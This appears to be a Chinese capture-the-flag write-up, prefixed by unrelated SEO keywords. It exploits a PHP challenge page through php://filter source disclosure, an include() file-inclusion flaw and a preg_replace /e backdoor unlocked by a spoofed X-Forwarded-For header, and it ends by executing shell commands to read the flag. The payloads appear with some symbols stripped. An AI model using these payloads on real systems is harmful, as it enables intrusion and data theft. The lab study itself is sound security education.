购物网站技术方案,wordpress 手机顶部悬浮,怎么做阿里巴巴网站,网站策划与建设首先根据题目提示#xff0c;进入云平台设备维护中心页面#xff1a; 页面无异常#xff0c;检查源代码#xff1a; 发现注入点 ?page#xff0c;大致有如下思路#xff1a;1、SSTI模板引擎漏洞#xff1b;2、XXS#xff1b;3、PHP伪协议。
首先尝试SSTI漏洞#xf…首先根据题目提示进入云平台设备维护中心页面 页面无异常检查源代码 发现注入点 ?page大致有如下思路1、SSTI模板引擎漏洞2、XXS3、PHP伪协议。
首先尝试SSTI漏洞构造payload: ?page{{4*5}}提交结果如下 发现页面无回显说明大概率不存在SSTI漏洞。
然后测试XXS漏洞构造payload: ?pagescriptalert(1)/script提交结果如下 页面无响应说明大概率不存在XSS漏洞。
最后测试PHP伪协议
当payload为 ?pageindex 时页面如下 当修改payload为 ?page123 时提交页面如下 再次修改payload为 ?pageindex.php 时 页面显示OK说明可能存在文件包含漏洞 上图引用文章自--上图出处。
首先测试 php://inputphp://input可以进行php代码的提交抓包构造payload 所以php://input不可行。
接着测试 php://filter构造payload来包含index.php来获取它的源码
payload: ?pagephp://filter/resourceindex.php
提交发现index.php被重复执行了 说明源码中使用的文件包含函数是 include、require这类函数这类函数直接包含文件会导致其中的代码直接被执行若要包含文件而不希望其中的代码被执行则可以考虑file_get_content()函数。
所以我们需要使用过滤器来读取源码
构造payload ?pagephp://filter/readconvert.base64-encode/resourceindex.php提交页面如下 得到经过 base64 加密后的源码在解码工具中进行解码得到index.php源码如下
?php$page $_GET[page];if (isset($page)) {if (ctype_alnum($page)) {
?br /br /br /br /div styletext-align:centerp classlead?php echo $page; die();?/pbr /br /br /br /?php}else{?br /br /br /br /div styletext-align:centerp classlead?phpif (strpos($page, input) 0) {die();}if (strpos($page, ta:text) 0) {die();}if (strpos($page, text) 0) {die();}if ($page index.php) {die(Ok); //输入值为index.php时回显OK的原因}include($page); //使用include()方法包含文件die();?/pbr /br /br /br /?php
}}//方便的实现输入输出的功能,正在开发中的功能只能内部人员测试//以下才为关键代码if ($_SERVER[HTTP_X_FORWARDED_FOR] 127.0.0.1) {echo br Welcome My Admin ! br ;$pattern $_GET[pat];$replacement $_GET[rep];$subject $_GET[sub];if (isset($pattern) isset($replacement) isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}}?
解题关键在最后一个if判断中若想判断返回True则需要抓包修改 X-Forwarded-For: X-Forwarded-For 是一个 HTTP 请求头部字段用于指示客户端真实的 IP 地址尤其是当请求经过了一个或多个代理服务器或负载均衡器时。这个字段的主要作用是提供了客户端的原始 IP 地址即使请求经过了中间的代理服务器也能够追踪到真实的客户端地址。 在http请求中添加X-Forwarded-For参数发现成功回显。接下来的解题关键为 preg_replace()函数。 preg_replace(参数一参数二参数三)函数 参数一要搜索的正则表达式 参数二用于替换匹配部分的字符串 参数三要被进行替换的原始字符串 构造payload ?pat/abc/erepsystem(ls)subabc。 正则表达式中的 /e 修饰符在 PHP 中已经被废弃它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。在较早的 PHP 版本中preg_replace() 函数支持 /e 修饰符但由于其存在严重的安全隐患自 PHP 5.5.0 版本开始被弃用并在 PHP 7.0.0 版本中完全移除。 利用正则表达式将 abc 替换为 system(ls)再使用正则表达式 /e 来执行命令 发现命令可以被成功执行并发现可疑文件s3chahahaDir构造新的payload将当前目录切换至s3chahahaDir中并查找flag。
构造payload ?pat/abc/erepsystem(cd%20s3chahahaDir%26%26ls)subabc %20空格 %26 %26%26 提交页面如下 发现目录下存在文件flag猜测flag值很有可能就在文件flag中jia于是构造新的payload去访问flag
payload: ?pat/abc/erepsystem(cd%20s3chahahaDir/flag%26%26ls)subabc提交页面如下 发现flag.php构造payload访问flag.php:
payload: ?pat/abc/erepsystem(cat%20s3chahahaDir/flag/flag.php)subabc 成功拿到flag。
